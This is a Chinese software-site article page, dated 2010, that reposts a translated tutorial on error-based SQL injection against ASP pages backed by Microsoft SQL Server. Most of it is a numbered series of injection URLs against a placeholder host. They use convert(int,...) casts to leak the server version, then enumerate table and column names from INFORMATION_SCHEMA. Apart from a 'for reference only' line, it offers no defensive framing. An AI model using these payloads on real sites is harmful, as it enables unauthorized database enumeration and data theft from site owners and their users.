Microsoft OLE DB [sql injection][.asp]-安全防护-安全防线-文章中心

您的位置: 飞扬精品软件园 >> 文章中心 >> 安全防线 >> 安全防护 >> Microsoft OLE DB [sql injection][.asp]

本类文章排行

本周下载排行

本月下载排行

Microsoft OLE DB [sql injection][.asp]

阅览次数: 文章来源: 原文作者: 整理日期: 2010-05-22

作者：rexus351
邮箱：rexus351@yahoo.com
翻译：UpFonT

首先查看其os版本

.asp?id=1 or 1=convert(int,(@@version)
.asp?id=convert(int,(@@version))
.asp?id=@@version

第一步.查看os版本
http://www.xxx.com/News.asp?ID=convert(int,(@@version))

第二步.查看table name
http://www.xxx.com/News.asp?ID=convert(int,(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)) // mssql好似没有这个默认数据库的，mysql才有的
我们可以看到 'dtproperties' 表

第三步.查看其它table name
http://www.xxx.com/News.asp?ID=convert(int,(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN
('dtproperties')))

第四步.查看column names
http://www.xxx.com/News.asp?ID=convert(int,(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='dtp
roperties'))

以上步骤仅供参考，有不对的地方请指出

Windows 7 NVIDIA Edition 2010 x86 and x64 | 4.04 G..

1966年生产的广州珠江 SB6-2型 6晶体管中波收音机(语..

查看所有评论

网友对Microsoft OLE DB [sql injection][.asp]的评论

我要发表评论

网名:
主题:
内容:
验证码:

最近文章更新

相关文章链接

本类文章排行

最新新闻资讯

本周下载排行

本月下载排行

Microsoft OLE DB [sql injection][.asp]

Microsoft OLE DB [sql injection][.asp]

网友对Microsoft OLE DB [sql injection][.asp]的评论